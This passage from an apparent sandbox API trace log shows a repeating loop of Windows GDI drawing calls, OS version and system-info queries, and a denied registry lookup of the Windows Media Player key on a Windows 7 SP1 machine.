y2=0) returned 0x1040eac [0088.112] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ead [0088.112] CombineRgn (hrgnDst=0x1040eac, hrgnSrc1=0xf10401d6, hrgnSrc2=0xf30401d3, iMode=1) returned 1 [0088.112] CombineRgn (hrgnDst=0x1040ead, hrgnSrc1=0xf10401d6, hrgnSrc2=0xf30401d3, iMode=4) returned 2 [0088.112] CreateSolidBrush (color=0xff) returned 0x2100eab [0088.112] CreateSolidBrush (color=0xff0000) returned 0x1100eae [0088.112] DeleteObject (ho=0x1100eae) returned 1 [0088.112] DeleteObject (ho=0xf30401d3) returned 1 [0088.112] DeleteObject (ho=0xf10401d6) returned 1 [0088.112] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.112] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.112] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.112] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.112] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.112] BeginPath (hdc=0x0) returned 0 [0088.112] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.112] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.112] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.112] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.112] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.112] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.112] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.112] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.112] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf40401d3 [0088.112] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf20401d6 [0088.112] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eaf [0088.112] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eb0 [0088.112] CombineRgn (hrgnDst=0x1040eaf, hrgnSrc1=0xf40401d3, hrgnSrc2=0xf20401d6, iMode=1) returned 1 [0088.112] CombineRgn (hrgnDst=0x1040eb0, hrgnSrc1=0xf40401d3, hrgnSrc2=0xf20401d6, iMode=4) returned 2 [0088.112] CreateSolidBrush (color=0xff) returned 0x2100eae [0088.112] CreateSolidBrush (color=0xff0000) returned 0x1100eb1 [0088.112] DeleteObject (ho=0x1100eb1) returned 1 [0088.112] DeleteObject (ho=0xf20401d6) returned 1 [0088.112] DeleteObject (ho=0xf40401d3) returned 1 [0088.112] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.112] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.112] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.113] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.113] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.113] BeginPath (hdc=0x0) returned 0 [0088.113] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.113] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.113] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.113] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.113] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.113] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.113] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.113] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.113] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf30401d6 [0088.113] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf50401d3 [0088.113] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eb2 [0088.113] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eb3 [0088.113] CombineRgn (hrgnDst=0x1040eb2, hrgnSrc1=0xf30401d6, hrgnSrc2=0xf50401d3, iMode=1) returned 1 [0088.113] CombineRgn (hrgnDst=0x1040eb3, hrgnSrc1=0xf30401d6, hrgnSrc2=0xf50401d3, iMode=4) returned 2 [0088.113] CreateSolidBrush (color=0xff) returned 0x2100eb1 [0088.113] CreateSolidBrush (color=0xff0000) returned 0x1100eb4 [0088.113] DeleteObject (ho=0x1100eb4) returned 1 [0088.113] DeleteObject (ho=0xf50401d3) returned 1 [0088.113] DeleteObject (ho=0xf30401d6) returned 1 [0088.113] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.113] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.113] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.113] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.113] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.113] BeginPath (hdc=0x0) returned 0 [0088.113] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.113] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.113] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.113] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.113] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.113] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.113] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.113] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.114] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf60401d3 [0088.114] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf40401d6 [0088.114] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eb5 [0088.114] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eb6 [0088.114] CombineRgn (hrgnDst=0x1040eb5, hrgnSrc1=0xf60401d3, hrgnSrc2=0xf40401d6, iMode=1) returned 1 [0088.114] CombineRgn (hrgnDst=0x1040eb6, hrgnSrc1=0xf60401d3, hrgnSrc2=0xf40401d6, iMode=4) returned 2 [0088.114] CreateSolidBrush (color=0xff) returned 0x2100eb4 [0088.114] CreateSolidBrush (color=0xff0000) returned 0x1100eb7 [0088.114] DeleteObject (ho=0x1100eb7) returned 1 [0088.114] DeleteObject (ho=0xf40401d6) returned 1 [0088.114] DeleteObject (ho=0xf60401d3) returned 1 [0088.114] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.114] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.114] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.114] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.114] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.114] BeginPath (hdc=0x0) returned 0 [0088.114] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.114] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.114] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.114] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.114] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.114] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.114] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.114] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.114] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf50401d6 [0088.114] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf70401d3 [0088.114] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eb8 [0088.114] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040eb9 [0088.114] CombineRgn (hrgnDst=0x1040eb8, hrgnSrc1=0xf50401d6, hrgnSrc2=0xf70401d3, iMode=1) returned 1 [0088.114] CombineRgn (hrgnDst=0x1040eb9, hrgnSrc1=0xf50401d6, hrgnSrc2=0xf70401d3, iMode=4) returned 2 [0088.114] CreateSolidBrush (color=0xff) returned 0x2100eb7 [0088.114] CreateSolidBrush (color=0xff0000) returned 0x1100eba [0088.114] DeleteObject (ho=0x1100eba) returned 1 [0088.114] DeleteObject (ho=0xf70401d3) returned 1 [0088.114] DeleteObject (ho=0xf50401d6) returned 1 [0088.115] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.115] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.115] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.115] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.115] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.115] BeginPath (hdc=0x0) returned 0 [0088.115] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.115] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.115] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.115] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.115] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.115] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.115] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.115] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.115] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf80401d3 [0088.115] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf60401d6 [0088.115] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ebb [0088.115] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ebc [0088.115] CombineRgn (hrgnDst=0x1040ebb, hrgnSrc1=0xf80401d3, hrgnSrc2=0xf60401d6, iMode=1) returned 1 [0088.115] CombineRgn (hrgnDst=0x1040ebc, hrgnSrc1=0xf80401d3, hrgnSrc2=0xf60401d6, iMode=4) returned 2 [0088.115] CreateSolidBrush (color=0xff) returned 0x2100eba [0088.115] CreateSolidBrush (color=0xff0000) returned 0x1100ebd [0088.115] DeleteObject (ho=0x1100ebd) returned 1 [0088.115] DeleteObject (ho=0xf60401d6) returned 1 [0088.115] DeleteObject (ho=0xf80401d3) returned 1 [0088.115] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.115] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.115] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.115] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.115] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.115] BeginPath (hdc=0x0) returned 0 [0088.115] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.115] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.115] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.115] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.115] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.115] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.116] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.116] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.116] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf70401d6 [0088.116] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf90401d3 [0088.116] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ebe [0088.116] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ebf [0088.116] CombineRgn (hrgnDst=0x1040ebe, hrgnSrc1=0xf70401d6, hrgnSrc2=0xf90401d3, iMode=1) returned 1 [0088.116] CombineRgn (hrgnDst=0x1040ebf, hrgnSrc1=0xf70401d6, hrgnSrc2=0xf90401d3, iMode=4) returned 2 [0088.116] CreateSolidBrush (color=0xff) returned 0x2100ebd [0088.116] CreateSolidBrush (color=0xff0000) returned 0x1100ec0 [0088.116] DeleteObject (ho=0x1100ec0) returned 1 [0088.116] DeleteObject (ho=0xf90401d3) returned 1 [0088.116] DeleteObject (ho=0xf70401d6) returned 1 [0088.116] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.116] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.116] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.116] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.116] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.116] BeginPath (hdc=0x0) returned 0 [0088.116] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.116] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.116] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.116] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.116] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.116] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.116] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.116] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.116] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfa0401d3 [0088.116] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf80401d6 [0088.116] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ec1 [0088.116] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ec2 [0088.116] CombineRgn (hrgnDst=0x1040ec1, hrgnSrc1=0xfa0401d3, hrgnSrc2=0xf80401d6, iMode=1) returned 1 [0088.117] CombineRgn (hrgnDst=0x1040ec2, hrgnSrc1=0xfa0401d3, hrgnSrc2=0xf80401d6, iMode=4) returned 2 [0088.117] CreateSolidBrush (color=0xff) returned 0x2100ec0 [0088.117] CreateSolidBrush (color=0xff0000) returned 0x1100ec3 [0088.117] DeleteObject (ho=0x1100ec3) returned 1 [0088.117] DeleteObject (ho=0xf80401d6) returned 1 [0088.117] DeleteObject (ho=0xfa0401d3) returned 1 [0088.117] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.117] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.117] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.117] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.117] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.117] BeginPath (hdc=0x0) returned 0 [0088.117] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.117] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.117] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.117] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.117] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.117] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.117] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.117] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.117] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf90401d6 [0088.117] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfb0401d3 [0088.117] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ec4 [0088.117] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ec5 [0088.117] CombineRgn (hrgnDst=0x1040ec4, hrgnSrc1=0xf90401d6, hrgnSrc2=0xfb0401d3, iMode=1) returned 1 [0088.117] CombineRgn (hrgnDst=0x1040ec5, hrgnSrc1=0xf90401d6, hrgnSrc2=0xfb0401d3, iMode=4) returned 2 [0088.117] CreateSolidBrush (color=0xff) returned 0x2100ec3 [0088.117] CreateSolidBrush (color=0xff0000) returned 0x1100ec6 [0088.117] DeleteObject (ho=0x1100ec6) returned 1 [0088.117] DeleteObject (ho=0xfb0401d3) returned 1 [0088.117] DeleteObject (ho=0xf90401d6) returned 1 [0088.117] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.117] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.117] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.117] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.117] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.117] BeginPath (hdc=0x0) returned 0 [0088.118] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.118] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.118] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.118] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.118] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.118] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.118] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.118] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.118] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfc0401d3 [0088.118] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfa0401d6 [0088.118] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ec7 [0088.118] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ec8 [0088.118] CombineRgn (hrgnDst=0x1040ec7, hrgnSrc1=0xfc0401d3, hrgnSrc2=0xfa0401d6, iMode=1) returned 1 [0088.118] CombineRgn (hrgnDst=0x1040ec8, hrgnSrc1=0xfc0401d3, hrgnSrc2=0xfa0401d6, iMode=4) returned 2 [0088.118] CreateSolidBrush (color=0xff) returned 0x2100ec6 [0088.118] CreateSolidBrush (color=0xff0000) returned 0x1100ec9 [0088.118] DeleteObject (ho=0x1100ec9) returned 1 [0088.118] DeleteObject (ho=0xfa0401d6) returned 1 [0088.118] DeleteObject (ho=0xfc0401d3) returned 1 [0088.118] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: 